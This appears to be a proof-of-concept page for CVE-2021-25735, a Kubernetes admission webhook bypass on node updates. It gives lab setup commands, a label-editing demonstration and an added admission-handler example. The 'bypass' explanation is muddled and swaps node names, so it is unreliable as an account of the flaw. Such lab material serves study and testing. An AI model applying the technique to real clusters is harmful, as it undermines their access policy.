
POC details: c56f6793de8506f85dec651ede1a6f8a82a07077

Source
Related vulnerability
Title: Kubernetes SIGs kube-apiserver security vulnerability (CVE-2021-25735)
Description: Kubernetes SIGs kube-apiserver is open-source application software from Kubernetes SIGs. It validates and configures the data of API objects such as containers, services and replication controllers. A security vulnerability exists in Kubernetes SIGs kube-apiserver that allows a node update to bypass a Validating Admission Webhook.
Description
Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass
Introduction
# CVE-2021-25735
## Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

### Set the Vulnerable Environment

Let's start by running the script gencerts.sh to generate the TLS certificates and keys. \
`bash gencerts.sh`

To deploy the admission controller you need to build the Docker container image locally, tag it, and push it to your Docker Hub repository using the commands below (`darryk/dev` is the author's repository; if you push to your own, update the image reference in webhook-deploy.yaml to match).\
`docker login` \
`docker build -t validationwebhook:1.0 .` \
`docker tag validationwebhook:1.0 darryk/dev:1.0` \
`docker push darryk/dev:1.0`

Now you can deploy the image containing the Node.js application into your K8s cluster. webhook-deploy.yaml creates all the components the webhook needs in your cluster. \
`kubectl apply -f webhook-deploy.yaml`

Let's now register our webhook with the Kubernetes API Server. To do that, we take the Base64 encoding of the ca.crt file generated earlier and substitute it for CA_BUNDLE inside webhook-registration.yaml. The value must be a single line, so strip the line wrapping that `base64` adds by default: \
`base64 ca.crt | tr -d '\n'`

Finally, we will register the webhook with the Kubernetes API Server. \
`kubectl apply -f webhook-registration.yaml`


### Exploit CVE-2021-25735

We change the node's labels with `kubectl edit nodes`, adding a new label:\
`kubectl edit nodes ip-172-20-61-82.ec2.internal`

```yaml
  labels:
    test: test
    changeAllowed: "false"
```

Since `changeAllowed` is set to `"false"`, the webhook denies the request and we get the following error:
> error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed
> You can run `kubectl replace -f /tmp/kubectl-edit-irc64.yaml` to try this update again.

If we retry the edit on the node with the following change instead:\
```yaml
  labels:
    test: test
    changeAllowed: "true"
```

In this case the edit is accepted, bypassing the admission controller.
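To make the webhook's decision concrete, here is an added example of the admission logic the exercise above exercises: a handler that deserialises an AdmissionReview, denies a Node whose incoming labels carry `changeAllowed: "false"` with the "Validation failed" message seen in the error, and fails closed on malformed input. This is illustrative code written for this page, not the POC's own server.js; the label name, message and node name come from the README, the uid is constructed.

```javascript
// Added illustration (not the POC's server.js): minimal validating admission
// logic for Node objects. Deny when the incoming object is labelled
// changeAllowed: "false"; allow otherwise; fail closed on malformed requests.

// Label map of a Kubernetes object, tolerating missing metadata.
function labelsOf(obj) {
  return (obj && obj.metadata && obj.metadata.labels) || {};
}

// Build the AdmissionReview response for one parsed review object.
function admissionResponse(review) {
  const req = review && review.request;
  // Anything that is not a well-formed AdmissionReview is rejected, never allowed.
  if (!req || review.kind !== "AdmissionReview") {
    return {
      apiVersion: "admission.k8s.io/v1",
      kind: "AdmissionReview",
      response: { uid: req ? req.uid : "", allowed: false,
                  status: { code: 400, message: "Malformed AdmissionReview" } },
    };
  }
  const denied = labelsOf(req.object).changeAllowed === "false";
  const response = { uid: req.uid, allowed: !denied };
  if (denied) {
    // Same message the API server surfaced in the README's kubectl error.
    response.status = { code: 403, message: "Validation failed" };
  }
  return { apiVersion: "admission.k8s.io/v1", kind: "AdmissionReview", response };
}

// Raw HTTP body in, raw JSON body out; unparsable bodies are denied.
function handleBody(body) {
  let review = null;
  try { review = JSON.parse(body); } catch (e) { /* fall through to deny */ }
  return JSON.stringify(admissionResponse(review));
}

// Constructed sample: the README's first edit, adding changeAllowed: "false".
const deniedReview = {
  apiVersion: "admission.k8s.io/v1",
  kind: "AdmissionReview",
  request: {
    uid: "11111111-2222-3333-4444-555555555555", // constructed uid
    kind: { group: "", version: "v1", kind: "Node" },
    operation: "UPDATE",
    object: { metadata: { name: "ip-172-20-61-82.ec2.internal",
                          labels: { test: "test", changeAllowed: "false" } } },
  },
};
```

Wire `handleBody` into an HTTPS server that uses the certificates from gencerts.sh to obtain a deployable webhook.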
File snapshot

```
[4.0K] /data/pocs/c56f6793de8506f85dec651ede1a6f8a82a07077
├── [4.0K] app
│   ├── [ 362] package.json
│   ├── [ 14K] package-lock.json
│   └── [1.4K] server.js
├── [  17] ca.srl
├── [ 233] Dockerfile
├── [ 494] gencerts.sh
├── [1.0K] LICENSE
├── [1.8K] README.md
├── [ 725] webhook-deploy.yaml
└── [1.8K] webhook-registration.yaml

1 directory, 10 files
```